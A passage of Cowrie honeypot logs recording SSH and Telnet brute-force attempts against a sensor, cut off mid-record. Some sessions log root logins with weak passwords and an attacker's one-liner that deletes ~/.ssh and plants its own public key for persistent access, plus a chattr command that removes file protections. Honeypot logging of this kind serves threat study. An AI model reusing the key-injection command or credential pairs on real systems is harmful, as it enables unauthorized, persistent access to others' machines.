{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:19:30.588402Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:19:30.773961Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:19:30.774637Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:19:30.860831Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:19:30.861666Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44382,"dst_ip":"1.2.3.4","dst_port":22,"session":"01b15ae8d922","protocol":"ssh","message":"New connection: 212.227.235.229:44382 (1.2.3.4:22) [session: 01b15ae8d922]","sensor":"my-vps","timestamp":"2025-09-09T08:19:30.942979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:19:30.943961Z","src_ip":"212.227.235.229","session":"01b15ae8d922"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:19:31.026837Z","src_ip":"212.227.235.229","session":"01b15ae8d922"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:19:31.398776Z","src_ip":"212.227.235.229","session":"01b15ae8d922"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:19:32.487471Z","src_ip":"212.227.235.229","session":"01b15ae8d922"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50760,"dst_ip":"1.2.3.4","dst_port":22,"session":"75d98f9e7ef5","protocol":"ssh","message":"New connection: 212.227.235.229:50760 (1.2.3.4:22) [session: 75d98f9e7ef5]","sensor":"my-vps","timestamp":"2025-09-09T08:19:32.570892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:19:32.571609Z","src_ip":"212.227.235.229","session":"75d98f9e7ef5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:19:32.655464Z","src_ip":"212.227.235.229","session":"75d98f9e7ef5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:19:33.035694Z","src_ip":"212.227.235.229","session":"75d98f9e7ef5"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:19:33.119993Z","src_ip":"212.227.235.229","session":"c004f8b03a11"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:19:33.121070Z","src_ip":"212.227.235.229","session":"75d98f9e7ef5"}
{"eventid":"cowrie.session.connect","src_ip":"81.26.205.105","src_port":63699,"dst_ip":"1.2.3.4","dst_port":22,"session":"25cf1b832e8d","protocol":"ssh","message":"New connection: 81.26.205.105:63699 (1.2.3.4:22) [session: 25cf1b832e8d]","sensor":"my-vps","timestamp":"2025-09-09T08:19:38.965013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ROSSSH","message":"Remote SSH version: SSH-2.0-ROSSSH","sensor":"my-vps","timestamp":"2025-09-09T08:19:39.087025Z","src_ip":"81.26.205.105","session":"25cf1b832e8d"}
{"eventid":"cowrie.client.kex","hassh":"e7c5793d3b7d9f4dd6bd9e027595e061","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512;aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes1256-ctr;hmac-sha1,hmac-sha2-256,hmac-sha2-512;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512"],"keyAlgs":["ssh-rsa","ssh-dss","rsa-sha2-256","rsa-sha2-512"],"encCS":["aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes1256-ctr"],"macCS":["hmac-sha1","hmac-sha2-256","hmac-sha2-512"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e7c5793d3b7d9f4dd6bd9e027595e061","sensor":"my-vps","timestamp":"2025-09-09T08:19:39.348929Z","src_ip":"81.26.205.105","session":"25cf1b832e8d"}
{"eventid":"cowrie.session.connect","src_ip":"184.105.139.67","src_port":53338,"dst_ip":"1.2.3.4","dst_port":22,"session":"d67f26ec8364","protocol":"ssh","message":"New connection: 184.105.139.67:53338 (1.2.3.4:22) [session: d67f26ec8364]","sensor":"my-vps","timestamp":"2025-09-09T08:19:40.585471Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u0018;/\\xf0Tp\\xf7\\xd7\\xcd(}\f\\x9fZeHx\\xdb","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u0018;/\\xf0Tp\\xf7\\xd7\\xcd(}\f\\x9fZeHx\\xdb","sensor":"my-vps","timestamp":"2025-09-09T08:19:40.619862Z","src_ip":"184.105.139.67","session":"d67f26ec8364"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:19:40.621012Z","src_ip":"184.105.139.67","session":"d67f26ec8364"}
{"eventid":"cowrie.login.failed","username":"super","password":"super","message":"login attempt [super/super] failed","sensor":"my-vps","timestamp":"2025-09-09T08:19:40.740868Z","src_ip":"81.26.205.105","session":"25cf1b832e8d"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:19:42.118520Z","src_ip":"81.26.205.105","session":"25cf1b832e8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59338,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe76e0a219e1","protocol":"ssh","message":"New connection: 212.227.235.229:59338 (1.2.3.4:22) [session: fe76e0a219e1]","sensor":"my-vps","timestamp":"2025-09-09T08:20:36.621315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:20:36.622261Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:20:36.705023Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.login.success","username":"root","password":"Changeme!@#","message":"login attempt [root/Changeme!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:20:37.083964Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:20:37.295829Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:20:37.296558Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:20:37.297982Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:20:37.384814Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:20:37.604209Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:20:37.604892Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:20:37.689601Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:20:37.690574Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59342,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7dbc0c4df53","protocol":"ssh","message":"New connection: 212.227.235.229:59342 (1.2.3.4:22) [session: a7dbc0c4df53]","sensor":"my-vps","timestamp":"2025-09-09T08:20:37.783639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:20:37.784298Z","src_ip":"212.227.235.229","session":"a7dbc0c4df53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:20:37.869143Z","src_ip":"212.227.235.229","session":"a7dbc0c4df53"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:20:38.254188Z","src_ip":"212.227.235.229","session":"a7dbc0c4df53"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:20:39.341304Z","src_ip":"212.227.235.229","session":"a7dbc0c4df53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59354,"dst_ip":"1.2.3.4","dst_port":22,"session":"19488950c091","protocol":"ssh","message":"New connection: 212.227.235.229:59354 (1.2.3.4:22) [session: 19488950c091]","sensor":"my-vps","timestamp":"2025-09-09T08:20:39.425441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:20:39.426312Z","src_ip":"212.227.235.229","session":"19488950c091"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:20:39.511290Z","src_ip":"212.227.235.229","session":"19488950c091"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:20:39.892916Z","src_ip":"212.227.235.229","session":"19488950c091"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:20:39.984302Z","src_ip":"212.227.235.229","session":"fe76e0a219e1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:20:39.985489Z","src_ip":"212.227.235.229","session":"19488950c091"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":58114,"dst_ip":"1.2.3.4","dst_port":23,"session":"65723dffcc2e","protocol":"telnet","message":"New connection: 3.132.23.201:58114 (1.2.3.4:23) [session: 65723dffcc2e]","sensor":"my-vps","timestamp":"2025-09-09T08:20:40.929093Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-09-09T08:20:40.930645Z","src_ip":"3.132.23.201","session":"65723dffcc2e"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-09-09T08:20:40.931510Z","src_ip":"3.132.23.201","session":"65723dffcc2e"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-09-09T08:20:40.932651Z","src_ip":"3.132.23.201","session":"65723dffcc2e"}
{"eventid":"cowrie.session.closed","duration":0.1383967399597168,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:20:41.067399Z","src_ip":"3.132.23.201","session":"65723dffcc2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41508,"dst_ip":"1.2.3.4","dst_port":22,"session":"100ad877fc4e","protocol":"ssh","message":"New connection: 212.227.125.160:41508 (1.2.3.4:22) [session: 100ad877fc4e]","sensor":"my-vps","timestamp":"2025-09-09T08:20:43.253458Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:20:43.254973Z","src_ip":"212.227.125.160","session":"100ad877fc4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54162,"dst_ip":"1.2.3.4","dst_port":22,"session":"a215cb355b60","protocol":"ssh","message":"New connection: 212.227.235.229:54162 (1.2.3.4:22) [session: a215cb355b60]","sensor":"my-vps","timestamp":"2025-09-09T08:21:46.311472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:21:46.312161Z","src_ip":"212.227.235.229","session":"a215cb355b60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp25